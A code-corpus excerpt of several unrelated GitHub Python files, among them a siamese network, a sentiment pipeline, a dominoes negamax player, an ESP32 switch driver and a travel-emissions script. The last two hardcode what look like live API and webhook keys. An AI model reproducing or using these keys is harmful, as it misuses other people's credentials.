len(self.person_ids), average_dists)\n\n # Set a threshold for a not-person\n thresh = 55\n if first_wt > thresh and self.ignore_person.id not in rejected_ids:\n # Set as an unknown person\n person_id = self.ignore_person\n weight_val = first_wt\n else:\n person_id = person\n weight_val = np.max((0, thresh - first_wt))\n\n u_img.set_possibles_zero()\n u_img.set_possible_person( person_id.id, 1, weight_val)\n\n\nclass siameseModel(nn.Module):\n def __init__(self, n_layers, activation, layers_sizes, dropouts, in_size, loss_type):\n\n super(siameseModel, self).__init__()\n\n layers = []\n for ii in range(n_layers):\n out_size = layers_sizes[ii]\n layers.append(nn.Linear(in_size, out_size))\n layers.append(getattr(nn, activation)())\n if ii < n_layers - 1:\n drop_pct = dropouts[ii]\n layers.append(nn.Dropout(drop_pct))\n\n in_size = out_size\n\n layers.append(getattr(nn, activation)())\n self.feature_fwd = nn.Sequential(*layers)\n\n self.loss_type = loss_type\n if self.loss_type == 'cross_entropy':\n self.joint_layer = nn.Linear(in_size, 1)\n\n def forward(self, *arg):\n if self.loss_type == 'cross_entropy':\n assert len(arg) == 2\n\n base = arg[0]\n second = arg[1]\n\n enc_1 = self.feature_fwd(base)\n enc_2 = self.feature_fwd(second)\n distance = torch.abs(enc_1 - enc_2)\n\n out = self.joint_layer(distance)\n\n return out # No sigmoid\n\n elif self.loss_type == 'triplet':\n assert len(arg) == 3\n base = self.feature_fwd(arg[0])\n pos = self.feature_fwd(arg[1])\n neg = self.feature_fwd(arg[2])\n\n return base, pos, neg","repo_name":"benjaminlewis-1000/django_picasa","sub_path":"face_manager/face_classify.py","file_name":"face_classify.py","file_ext":"py","file_size_in_byte":14785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"25758860861","text":"import os\nimport logging\n\nfrom typing import Optional\nfrom sentivi.data import DataLoader, TextEncoder\nfrom sentivi.classifier.nn_clf import NeuralNetworkClassifier\nfrom sentivi.classifier.transformer import TransformerClassifier\n\ntry:\n import _pickle as pickle\nexcept ModuleNotFoundError:\n import pickle\n\n\nclass Pipeline(object):\n \"\"\"\n Pipeline instance\n \"\"\"\n def __init__(self, *args, **kwargs):\n \"\"\"\n Initialize Pipeline instance\n\n :param args: arbitrary arguments\n :param kwargs: arbitrary keyword arguments\n \"\"\"\n super(Pipeline, self).__init__()\n self.apply_layers = list()\n language_model_shortcut = None\n\n for method in args:\n self.apply_layers.append(method)\n\n if isinstance(method, TransformerClassifier):\n language_model_shortcut = method.language_model_shortcut\n\n if language_model_shortcut is not None:\n for method in self.apply_layers:\n if isinstance(method, TextEncoder):\n if method.encode_type != 'transformer':\n logging.warning(f'Expected transformer encoder type for TextEncoder, '\n f'but got {method.encode_type}. It\\'s will be implicit cast into transformer')\n method.encode_type = 'transformer'\n method.language_model_shortcut = language_model_shortcut\n break\n\n self.__vocab = None\n self.__labels_set = None\n self.__n_grams = None\n self.__max_length = None\n self.__embedding_size = None\n\n def append(self, method):\n \"\"\"\n Append a callable layer\n\n :param method: [DataLayer, ClassifierLayer]\n :return: None\n \"\"\"\n self.apply_layers.append(method)\n\n def keyword_arguments(self):\n \"\"\"\n Return pipeline's protected attribute and its value in form of dictionary.\n\n :return: key-value of protected attributes\n :rtype: Dictionary\n \"\"\"\n return {attr[11:]: getattr(self, attr) for attr in dir(self) if\n attr[:10] == '_Pipeline_' and getattr(self, attr) is not None}\n\n def forward(self, *args, **kwargs):\n \"\"\"\n Execute all callable layer in self.apply_layers\n\n :param args:\n :param kwargs:\n :return:\n \"\"\"\n x = None\n for method in self.apply_layers:\n x = method(x, *args, **kwargs, **self.keyword_arguments())\n\n if isinstance(method, DataLoader):\n self.__n_grams, self.__vocab, self.__labels_set, self.__max_length = method.n_grams, method.vocab, \\\n method.labels_set, \\\n method.max_length\n\n return x\n\n def predict(self, x: Optional[list], *args, **kwargs):\n \"\"\"\n Predict target polarity from list of given features\n\n :param x: List of input texts\n :param args: arbitrary positional arguments\n :param kwargs: arbitrary keyword arguments\n :return: List of labels corresponding to given input texts\n :rtype: List\n \"\"\"\n for method in self.apply_layers:\n if isinstance(method, DataLoader):\n text_processor = method.text_processor\n x = [' '.join([_text for _text in text_processor(text).split(' ') if _text != '']) for text in x]\n continue\n x = method.predict(x, *args, **kwargs, **self.keyword_arguments())\n return x\n\n def decode_polarity(self, x: Optional[list]):\n \"\"\"\n Decode numeric polarities into label polarities\n\n :param x: List of numeric polarities (i.e [0, 1, 2, 1, 0])\n :return: List of label polarities (i.e ['neg', 'neu', 'pos', 'neu', 'neg']\n :rtype: List\n \"\"\"\n return [self.__labels_set[idx] for idx in x]\n\n def get_labels_set(self):\n \"\"\"\n Get labels set\n\n :return: List of labels\n :rtype: List\n \"\"\"\n return self.__labels_set\n\n def get_vocab(self):\n \"\"\"\n Get vocabulary\n\n :return: Vocabulary in form of List\n :rtype: List\n \"\"\"\n return self.__vocab\n\n def save(self, save_path: str):\n \"\"\"\n Save model to disk\n\n :param save_path: path to saved model\n :return:\n \"\"\"\n import dill\n with open(save_path, 'wb') as stream:\n dill.dump(self, stream)\n print(f'Saved model to {save_path}')\n\n @staticmethod\n def load(model_path: str):\n \"\"\"\n Load model from disk\n\n :param model_path: path to pre-trained model\n :return:\n \"\"\"\n import dill\n assert os.path.exists(model_path), FileNotFoundError(f'Could not found {model_path}')\n with open(model_path, 'rb') as stream:\n print(f'Loaded model from {model_path}')\n return dill.load(stream)\n\n def to(self, device):\n \"\"\"\n To device\n\n :param device:\n :return:\n \"\"\"\n for method in self.apply_layers:\n if isinstance(method, NeuralNetworkClassifier) or isinstance(method, TransformerClassifier):\n method.clf = method.clf.to(device)\n\n def get_server(self):\n \"\"\"\n Serving model\n\n :return:\n \"\"\"\n from sentivi.service import RESTServiceGateway\n\n return RESTServiceGateway(self, port=5000)\n\n __call__ = forward\n","repo_name":"vndee/sentivi","sub_path":"sentivi/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":5606,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"71"} +{"seq_id":"15279269151","text":"import pandas as pd\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom matplotlib import font_manager\n#字体\nmy_font=font_manager.FontProperties(fname=\"\")\n#统计每个种类型的电影的个数有多少action,scary;;;\nfile_path=\"./IMDB-Movie-Data.csv\"\ndf= pd.read_csv(file_path)\nprint(df.info())\nprint(df.head(1))\ndf_genre= df[\"Genre\"]\nprint(df_genre)\n#输出后发现数据之间是通过,隔开的所以通过split切开\ntemp_list = df_genre.str.split(\",\").tolist()#注意切开之后,这个是[[],[]]多个列表嵌套的所以使用set进行统计\n#将所有题材的类型的电影进行放到一个列表里\ngenre_list= list(set([i for j in temp_list for i in j]))\n\n#统计时,使用一个全0的数组进行统计\nzero_df = pd.DataFrame(np.zeros((df.shape[0],len(genre_list))),columns=genre_list)\n# 行索引actor 列索引(电影)\n#zero_df = pd.DataFrame(np.zeros((df.shape[0],len(genre_list))),columns=genre_list\nprint(zero_df)\n#统计\nfor i in range(df.shape[0]):#某行电影数据\n zero_df.loc[i,temp_list[i]]=1#第几行第几列的数据为\n\nprint(zero_df)\n#将每个电影数据的出现的地方均已标记为1\n#按照行进行统计王上打0\ncount = zero_df.sum(axis=0)\nprint(count)\n#将数据进行排序\ncount= count.sort_values()\n_x = count.index\n_y = count.values\n\n#画图:使用条形图,因为数据与数据之间是没有关系的\nplt.figure(figsize=(20,8),dpi=80)\nplt.bar(range(len(_x)),_y)\n\nplt.xticks(range(len(_x)),_x)\nplt.show()","repo_name":"gehong-coder/commit_paper","sub_path":"MachineLearning/数据分析/learnpandas电影统计2.py","file_name":"learnpandas电影统计2.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"28738982743","text":"import saltools.misc as sltm\n\nfrom os.path import join \n\ndef set_param (\n param ,\n value ):\n globals()[param] = value\ndef set_params (\n root = './' ):\n settings_dict = sltm.g_config(join(root, '__settings.json'))\n _params_list = {\n 'EXTRACTORS_SEPARATOR' : '-->' ,\n 'KWARGS_SEPARATOR' : '<->' ,\n 'ESC_OPEN' : '<(' ,\n 'ESC_CLOSE' : ')>' ,\n 'LIST_SEPARATOR' : '!!' ,\n 'COLLECTIONS_SEPARATOR' : '|=|' ,\n }\n\n for param, def_value in _params_list.items() :\n set_param(param, settings_dict.get('parameters',{}).get(param, def_value))\n \n set_param('RESOURCE_FOLDER', join(root, 'resources'))\n\nset_params()","repo_name":"SudipAdh/salscraper","sub_path":"src/salscraper/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"18682051896","text":"from DominoesGame import Dominoes, Domino\nimport random\n\n\nclass NegaMax:\n def __init__(self, currentGame):\n self.currentGame = currentGame\n\n def negamax(self, initial, depth, alpha, beta, player):\n cg = self.currentGame\n if depth == 0:\n return None, cg.evaluate(player)\n \n if cg.isEnd():\n q = cg.win_score(player)\n if not q:\n return None, cg.evaluate(player)\n return None, q\n\n maxMove, maxScore = None, None\n for move in sorted(cg.possible_actions(player), key=lambda x: -sum(x[0].vals)):\n prob = cg.makeProbabilisticMove(player, move)\n _, currentScore = self.negamax(initial, depth-1, -beta, -alpha, cg.get_next_player(player))\n currentScore = -prob * currentScore\n if maxScore is None or currentScore > maxScore:\n maxMove, maxScore = move, currentScore\n alpha = max(alpha, currentScore)\n cg.undoMove(player, move)\n if alpha >= beta:\n break\n return maxMove, maxScore\n\n\ndef setupGame(r):\n tiles = []\n for i in range(7):\n for j in range(i, 7):\n tiles.append((i, j))\n random.shuffle(tiles)\n myTiles = tiles[:7]\n players_tiles = {}\n players_tuples = [None]*4\n players_tiles[0] = set(map(lambda x: Domino(*x), myTiles))\n players_tuples[0] = myTiles\n for i in range(1, 4):\n this_players_tiles = tiles[7*i:7*(i+1)]\n players_tiles[i] = set(map(lambda x: Domino(*x), this_players_tiles))\n players_tuples[i] = this_players_tiles\n starter = r % 4\n return ((Dominoes(tiles, myTiles, starter), Dominoes(tiles, players_tuples[2], (starter+2) % 4)), players_tiles)\n\n\ndef greedyPlays(game, tiles):\n games = game\n game, ogame = games\n player = game.currentPlayer\n actions = game.possible_actions(None, False)\n my_tiles = tiles[player]\n possible_moves = [Domino(-1, -1)]\n for t in my_tiles:\n if t in actions:\n possible_moves.append(t)\n maximum = -1\n ret = possible_moves[0]\n for domino in possible_moves:\n if domino.vals[1] + domino.vals[0] > maximum:\n maximum = domino.vals[1] + domino.vals[0]\n ret = domino\n if (game.ends[0] in ret and game.ends[1] in ret and game.ends[0] != game.ends[1]):\n placement = random.choice((0, 1))\n game.update(ret, None, placement)\n ogame.update(ret, None, placement)\n else:\n game.update(ret, None)\n ogame.update(ret, None)\n if ret != Domino(-1, -1):\n tiles[player].remove(ret)\n return tiles\n\n\ndef negamaxPlays(game, tiles, player):\n player /= 2\n currentGame = game[int(player)]\n otherGame = game[int(1-player)]\n actions = currentGame.possible_actions(0)\n if len(actions) == 1:\n currentGame.update(actions[0][0])\n otherGame.update(actions[0][0])\n if not actions[0][0] == Domino(-1, -1):\n tiles[2*player].remove(actions[0][0])\n else:\n pnm = NegaMax(currentGame)\n max_move, _ = pnm.negamax(10, 10, 4, .3, 0)\n\n currentGame.update(max_move[0], placement=max_move[1])\n otherGame.update(max_move[0], placement=max_move[1])\n if not max_move[0] == Domino(-1, -1):\n tiles[2*player].remove(max_move[0])\n return tiles\n\n\ndef printScore(game, players_tiles):\n player_pips = [0]*4\n for t in game.myTiles:\n if t not in game.dominos_played:\n player_pips[0] += sum(t.vals)\n for i in range(1, 4):\n for t in players_tiles[i]:\n if t not in game.dominos_played:\n player_pips[i] += sum(t.vals)\n if (player_pips[0] == 0 or player_pips[2] == 0 or\n player_pips[0]+player_pips[2] < player_pips[1] + player_pips[3]):\n return 'won'\n if (player_pips[1] == 0 or player_pips[3] == 0 or\n player_pips[0]+player_pips[2] > player_pips[1] + player_pips[3]):\n return 'lost'\n if player_pips[0]+player_pips[2] == player_pips[1] + player_pips[3]:\n return 'tie'\n\n\ndef revealTiles(games, players_tiles):\n for i in range(4):\n for t in players_tiles[i]:\n games[0].probabilities[t] = [0]*4\n games[0].probabilities[t][i] = 1\n games[1].probabilities[t] = [0]*4\n games[1].probabilities[t][(i+2) % 4] = 1\n\n\ndef main():\n results = []\n for r in range(100):\n games, playerTiles = setupGame(r)\n revealTiles(games, playerTiles)\n while not games[0].isEnd():\n player = games[0].currentPlayer\n tiles = greedyPlays(games, playerTiles) if player % 2 == 1 else negamaxPlays(\n games, playerTiles, player)\n games[0].debugging()\n games[1].debugging()\n results.append(printScore(games[0], playerTiles))\n print(\"RESULTS\")\n print(\"Number of wins:\", results.count(\"won\"))\n print(\"Number of losses:\", results.count(\"lost\"))\n print(\"Number of ties:\", results.count(\"tie\"))\n\n\nmain()\n","repo_name":"521310kevin/Dominoes","sub_path":"Implementation.py","file_name":"Implementation.py","file_ext":"py","file_size_in_byte":5028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"2699519214","text":"from sqlalchemy.dialects.postgresql import insert\nfrom sqlalchemy import select, update, delete\n\nfrom workers_hierarchy.users.tables import workers\n\n\n__all__ = [\n 'select_worker_by_id',\n 'select_all_workers',\n 'update_worker_by_id',\n 'insert_worker',\n 'delete_worker_by_id'\n]\n\n\nasync def select_all_workers(conn):\n query = select(\n [\n workers.c.id,\n workers.c.first_name,\n workers.c.last_name,\n workers.c.surname,\n workers.c.position,\n workers.c.manager_id\n ]\n )\n cursor = await conn.execute(query)\n\n return await cursor.fetchall()\n\n\nasync def select_worker_by_id(conn, key):\n manager = workers.alias()\n query = select(\n [\n workers,\n manager.c.first_name.label('manager_first_name'),\n manager.c.last_name.label('manager_last_name'),\n manager.c.surname.label('manager_surname'),\n manager.c.id.label('id_manager')\n ])\\\n .join(manager, workers.c.manager_id == manager.c.id)\\\n .where(workers.c.id == key)\n cursor = await conn.execute(query)\n\n return await cursor.fetchone()\n\n\nasync def update_worker_by_id(conn, key, data):\n query = update(workers)\\\n .where(workers.c.id == key)\\\n .values(data)\n cursor = await conn.execute(query)\n\n return cursor\n\n\nasync def insert_worker(conn, data):\n query = insert(workers)\\\n .values(data)\\\n .on_conflict_do_nothing(constraint='const')\\\n .returning(workers.c.id)\n cursor = await conn.execute(query)\n return await cursor.scalar()\n\n\nasync def delete_worker_by_id(conn, key):\n query = delete(workers)\\\n .where(workers.c.id == key)\n cursor = await conn.execute(query)\n return cursor\n","repo_name":"DTeltsov/workers_hierarchy","sub_path":"workers_hierarchy/users/db_utils.py","file_name":"db_utils.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"30243970392","text":"import random\n\nN = 20 # cells in state\nG = 20 # generations to simulate\n\n# a rule is an 8-array of boolean values\n\ndef index_to_rule(i):\n rule = []\n bin_str = bin(i)[2:]\n for j in range(len(bin_str)):\n b = int(bin_str[j])\n rule.append(int(b))\n for j in range(8 - len(bin_str)):\n rule.append(0)\n return rule\n\nrule = index_to_rule(70)\n\ndef local_update(a, b, c):\n return rule[sum([\n 1 if a else 0,\n 2 if b else 0,\n 4 if c else 0])]\n\ndef update(row):\n row_new = [0] * N\n for i in range(N):\n if i == 0:\n row_new[i] = local_update(False, row[i], row[i+1])\n elif i == N-1:\n row_new[i] = local_update(row[i-1], row[i], False)\n else:\n row_new[i] = local_update(row[i-1], row[i], row[i+1])\n return row_new\n\ndef simulate(row):\n history = [row]\n for _ in range(G):\n row = update(row)\n history.append(row)\n return history\n\ndef write_history(history):\n with open(\"rowfinite_output.txt\", \"w+\") as file:\n file.write(str(history)\\\n .replace(\"[\", \"{\")\\\n .replace(\"]\", \"}\"))\n\ndef main():\n # row_start = [random.randint(0,1) for _ in range(N)]\n row_start = [0] * N\n row_start[len(row_start)//2] = 1\n history = simulate(row_start)\n write_history(history)\n\nmain()\n","repo_name":"Riib11/Metascience","sub_path":"paper/automata/rowfinite.py","file_name":"rowfinite.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"72692305190","text":"three_mul = 'fizz'\nfive_mul = 'buzz'\nnum1 = 3\nnum2 = 4 \nmax_num = 100\n \nfor i in range(1,max_num):\n # % or modulo division gives you the remainder \n \n if i%num1 == 0:\n print(i, three_mul)\n elif i%num2 == 0:\n print(i, five_mul)\n elif i % num1 == 0 and i % num2 == 0:\n print(i, three_mul + five_mul)","repo_name":"DanZech/DCI_Python","sub_path":"2023_01_04_introduction-bug_fixing/Task 1 - bug_fixing.py","file_name":"Task 1 - bug_fixing.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"18216590437","text":"from django.contrib import admin\nfrom django.urls import include, path\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('auth/', include('users.urls', namespace='users')),\n # Все адреса с префиксом /auth\n # будут прернаправлены в модуль django.contrib.auth\n path('auth/', include('django.contrib.auth.urls')),\n path('', include('posts.urls', namespace='posts')),\n path('about/', include('about.urls', namespace='about')),\n]\nhandler404 = 'core.views.page_not_found'\nhandler500 = 'core.views.server_error'\nhandler403 = 'core.views.permission_denied'\n\nif settings.DEBUG:\n urlpatterns += static(\n settings.MEDIA_URL, document_root=settings.MEDIA_ROOT\n )\n","repo_name":"Motion-Up/hw05_final","sub_path":"yatube/yatube/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"36416433821","text":"from contractfinder import db, Notice, NoticeDetail, NoticeDocument\n\ndb.create_all()\n\nnotice = Notice(id=1321842,\n ref_no='ABC123',\n length=36)\ndb.session.add(notice)\n\ndetails = NoticeDetail(id=1,\n notice_id=1321842,\n title='Air Quality Testing',\n buying_org='MoD',\n description='This is the description')\ndb.session.add(details)\n\nfile_ids = ['13523544-019b-49e5-9eee-93a6e0a5d551',\n 'ad3a309e-3ecf-404e-a8e0-c108a783bded',\n '3a431024-f743-4158-b0f8-1cedafd3c222',]\n #'bea068c5-5637-4ed9-8bb9-f0d48ff4295a',\n #'725401f4-7839-44b6-9365-8a32b0a3362c',\n #'d85a7462-ac38-40ba-9b16-660badf6ee98']\nfor i, file_id in enumerate(file_ids):\n db.session.add(NoticeDocument(id=i, \n notice_id=1321842,\n mimetype='application/pdf',\n file_id=file_id,\n filename='file{0}.pdf'.format(i),\n title='Document {0}'.format(i)))\n\ndb.session.commit()\n\nthe_notice = Notice.query.filter_by(id=1321842).first()\nprint(the_notice.details.title)\n","repo_name":"datagovuk/contracts-archive","sub_path":"populate.py","file_name":"populate.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"29739208133","text":"#!/usr/bin/env python3\nimport sys\nimport socket\nfrom threading import Thread, Lock\nfrom struct import pack, unpack\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nimport requests\n\nNO_TYPE = 0\nGPIO_26_OFF = 1\nGPIO_26_ON = 2\nGPIO_27_OFF = 3\nGPIO_27_ON = 4\n\nHEADER_LENGTH = 4\n\nTESTING = False\n\nGPIO_26_STATUS = \"off\"\nGPIO_27_STATUS = \"off\"\n\nGPIO_26_ON_PAGE = \"

\"\nGPIO_26_OFF_PAGE = \"

\"\nGPIO_27_ON_PAGE = \"

\"\nGPIO_27_OFF_PAGE = \"

\"\nHTML_PAGE = \"\"\"\n\n\n\n

ESP32 Web Server

\n

GPIO 26 - State %s

\n%s\n

GPIO 27 - State %s

\n%s\n\"\"\"\n\nIFTTT_URL = \"https://maker.ifttt.com/trigger/append_to_sheet/with/key/cUaZNrS7U0wAsZOzakzVUe\"\nsyn_bd_host = \"\"\nsyn_bd_uri = \"command/\"\nhttps_port = 443\n\nlocal_controller_address = \"192.168.5.250\"\nlocal_controller_port = 54321\n\ndevice_connection = None\nhttp_port = 8099\n\n\nclass Message:\n def __init__(self, message):\n self.type = None\n self.type = unpack('I', message)[0]\n self.type = socket.ntohl(self.type)\n\n def construct_message(self):\n message = pack('I', socket.htonl(self.type))\n return message\n\n\nclass WebServer_Driver:\n def __init__(self, device_port_number, vlan_id):\n self.device_connected = False\n self.device_connection = None\n self.device_socket = None\n self.device_socket = socket.socket(\n socket.AF_INET, socket.SOCK_STREAM)\n self.device_socket.setsockopt(\n socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.device_socket.bind((f'192.168.{vlan_id}.1', device_port_number))\n self.device_socket.listen(1)\n self.device_socket_listener_thread = Thread(\n target=self.accept_device_connection, args=())\n self.device_socket_listener_thread.start()\n self.device_socket_listener_thread.join()\n\n def accept_device_connection(self):\n # while True:\n (conn, address) = self.device_socket.accept()\n self.device_connection = conn\n self.get_command()\n\n def get_command(self):\n while True:\n r = requests.get(f\"https://{syn_bd_host}/{syn_bd_uri}\")\n if r.status_code != 200 or \\\n r.text == '0':\n continue\n # Turn on switch\n message = Message(bytes(HEADER_LENGTH))\n message.type = GPIO_26_ON\n msg = message.construct_message()\n self.device_connection.sendall(msg)\n # Send notification feedback to controller\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((local_controller_address, local_controller_port))\n s.send(b\"7\")\n\n\ndef main():\n if len(sys.argv) <= 2:\n print(\"Error number of arguments\")\n print(\"Usage: ${1} \")\n return -1\n\n webserver_driver = WebServer_Driver(int(sys.argv[1]), int(sys.argv[2]))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"synergylabs/iot-capture","sub_path":"macro-benchmark-esp32/pio-switch-webhook-custom-driver/src/WiFi_Web_Server_Outputs_driver.py","file_name":"WiFi_Web_Server_Outputs_driver.py","file_ext":"py","file_size_in_byte":3667,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"71"} +{"seq_id":"5894814006","text":"import os\nfrom HiveNetCore.utils.import_tool import DynamicLibManager\nfrom HiveNetPipeline import PipelineProcesser\nfrom HiveNetBuildTool.build import BuildPipeline\n\n\nclass ProcesserBuildGetSysInfos(PipelineProcesser):\n \"\"\"\n 获取系统信息\n \"\"\"\n\n @classmethod\n def processer_name(cls) -> str:\n \"\"\"\n 处理器名称,唯一标识处理器\n\n @returns {str} - 当前处理器名称\n \"\"\"\n return 'ProcesserBuildGetSysInfos'\n\n @classmethod\n def execute(cls, input_data, context: dict, pipeline_obj, run_id: str):\n \"\"\"\n 执行处理\n\n @param {object} input_data - 处理器输入数据值,除第一个处理器外,该信息为上一个处理器的输出值\n @param {dict} context - 传递上下文,该字典信息将在整个管道处理过程中一直向下传递,可以在处理器中改变该上下文信息\n @param {Pipeline} pipeline_obj - 管道对象\n\n @returns {object} - 处理结果输出数据值, 供下一个处理器处理, 异步执行的情况返回None\n \"\"\"\n # 获取当前要处理的标识\n _current_key = context.get('current_key', 'getSysInfos')\n _context_set_key = context.get('sys_infos_set_key', 'sysInfos') # 要设置到上下文的系统信息key\n _config = context['build_config'].get(_current_key, None)\n\n # 获取不到配置, 不处理\n if _config is None:\n return input_data\n\n # 获取扩展参数配置\n _extend_para = BuildPipeline.get_processer_extend_para(cls.processer_name(), default={})\n\n # 初始化插件管理模块\n _lib_manager = DynamicLibManager(os.getcwd())\n\n # 遍历参数查询可支持的系统信息\n _infos = {}\n for _get_id, _get_para in _config.items():\n if _get_para is None:\n _get_para = {}\n\n # 获取信息查询函数\n _info_type = _get_para.get('infoType', _get_id)\n _info_para = _extend_para.get(_info_type, None)\n if _info_para is None:\n raise ModuleNotFoundError('Info type [%s] not found in extend para!' % _info_type)\n\n _func = _info_para.get('func', None)\n if _func is None:\n _func = _lib_manager.load_by_config(_info_para['libConfig'])\n if not callable(_func):\n raise AttributeError('Info type [%s] is not callable!' % _info_type)\n\n _info_para['func'] = _func\n\n # 执行函数\n _get_key = _get_para.get('getKey', _info_para.get('getKey', _info_type))\n _infos[_get_key] = _func(\n *_get_para.get('args', []), **_get_para.get('kwargs', {})\n )\n\n # 将获取到的参数放入上下文\n context[_context_set_key] = _infos\n\n # 返回输出结果\n return input_data\n","repo_name":"snakeclub/HiveNetAssemble","sub_path":"HiveNetBuildTool/HiveNetBuildTool/plugins/processer_get_sys_infos.py","file_name":"processer_get_sys_infos.py","file_ext":"py","file_size_in_byte":2899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"74700604068","text":"from datetime import datetime\nfrom typing import Optional\n\nfrom pydantic import BaseModel, Field\n\nfrom app.models.course_timeslot import TimeSlotKind, WeekDay\n\n\n# Shared properties\nclass CourseTimeslotBase(BaseModel):\n code: str = Field(example=\"A\")\n timespan: str = Field(example=\"7:00-7:50\")\n weekday: WeekDay = Field(example=WeekDay.Fri)\n kind: TimeSlotKind = Field(example=TimeSlotKind.nctu)\n location: str = Field(example=\"EC022\")\n\n\nclass CourseTimeslotCreate(CourseTimeslotBase):\n \"\"\"Class for validating create CourseTimeslot request\"\"\"\n\n\nclass CourseTimeslotUpdate(CourseTimeslotBase):\n \"\"\"Class for validating update CourseTimeslot request\"\"\"\n\n code: Optional[str] = Field(None, example=\"B\")\n timespan: Optional[int] = Field(None, example=\"8:00-8:50\")\n weekday: Optional[WeekDay] = Field(None, example=WeekDay.Tue)\n kind: Optional[TimeSlotKind] = Field(None, example=TimeSlotKind.nctu)\n location: str = Field(None, example=\"EC022\")\n\n\n# Propeties to return to client\nclass CourseTimeslot(CourseTimeslotBase):\n class Config:\n orm_mode = True\n\n @classmethod\n def get_example(cls):\n # There's a bug in FastAPI for rendering nested example by default Field() method,\n # so we defined our exmaple method and get it outside\n return CourseTimeslot(\n code=\"C\",\n timespan=\"10:00-10:50\",\n weekday=WeekDay.Wed,\n kind=TimeSlotKind.nctu,\n location=\"ED202\",\n )\n\n\n# Properties shared by models stored in DB\nclass CourseTimeslotInDBBase(CourseTimeslotBase):\n id: int = Field(example=1)\n course_id: int = Field(example=34)\n\n create_at: datetime\n update_at: datetime\n\n class Config:\n orm_mode = True\n\n\n# Properties stored in DB\nclass CourseTimeslotInDB(CourseTimeslotInDBBase):\n pass\n","repo_name":"ianchen-tw/plus","sub_path":"plus/app/schemas/course_timeslot.py","file_name":"course_timeslot.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"73154402151","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Mar 4 19:50:17 2020\r\n\r\n@author: Lenovo\r\n\"\"\"\r\n\r\n\r\n#https://codeforces.com/contest/1316/problem/A\r\n\r\ndef add_total(array):\r\n output = 0\r\n for i in range(len(array)):\r\n output += int(array[i])\r\n return output\r\n\r\ndef maximize_grade():\r\n cases = int(input())\r\n students = [] #[0] = students, [1] = max grade\r\n grades = []\r\n for i in range(cases):\r\n students.append(input().split())\r\n grades.append(input().split())\r\n \r\n for i in range(len(students)):\r\n if int(students[i][1]) == int(grades[i][0]):\r\n print(int(grades[i][0]))\r\n else:\r\n total = add_total(grades[i])\r\n if total >= int(students[i][1]):\r\n print(int(students[i][1]))\r\n else:\r\n print(total)\r\n\r\n \r\nmaximize_grade()\r\n ","repo_name":"xlax007/Collection-of-Algorithms","sub_path":"Maximize_grade.py","file_name":"Maximize_grade.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"74551973350","text":"import sys\nsys.path.insert(0, '../code')\n\nimport unittest\nfrom q6 import mostFrequent\n\nclass MostFrequentNumTestCase(unittest.TestCase):\n\n def test_most_frequent(self):\n self.assertEqual(mostFrequent([1, 2, 3, 3, 3, 4, 2, 5, 1]), 3) \n self.assertEqual(mostFrequent([1, 1, 1, 1, 1, 1]), 1)\n self.assertTrue(mostFrequent([2, 2, 2, 3, 3, 3]) == 2 or mostFrequent([2, 2, 2, 3, 3, 3]) == 3) \n \nif __name__ == \"__main__\":\n unittest.main()","repo_name":"srividya-p/Forcepoint-Training","sub_path":"warmup/test/q6test.py","file_name":"q6test.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"21877874029","text":"from re import I\nimport googlemaps\nimport json\nimport requests\nimport math\nfrom datetime import date\nimport hashlib\nimport random\n\nCO2_NA_KM_AVTO = 180 #g/km\nCO2_NA_KM_BUS = 90 #g/km\nCO2_NA_KM_VLAK = 45 #g/km\nCENA_IZPUSTOV_VISOKA = 500 #€/t CO2\nCENA_IZPUSTOV_SREDNJA = 270 #€/t CO2\nCENA_IZPUSTOV_NIZKA = 156 #€/t CO2\nCENA_CASA_VISOKA = 0.18 #€/min\nCENA_CASA_SREDNJA = 0.09 #€/min\nCENA_CASA_NIZKA = 0.06 #€/min\nSTROSEK_AVTOMOBILA_NA_KM = 0.15 #€/km\nCENA_VLAK_NA_KM = 0.1 #€/km\n\nAPI_KEY = 'AIzaSyCtY_U7vcBuZna2_j4TiCxl9tUuSKL_8mM'\nSREDSTVA = [\"walking\", \"bicycling\", \"driving\", \"train\", \"bus\"]\n\nmap_client = googlemaps.Client(API_KEY)\n\nzacetni_url = 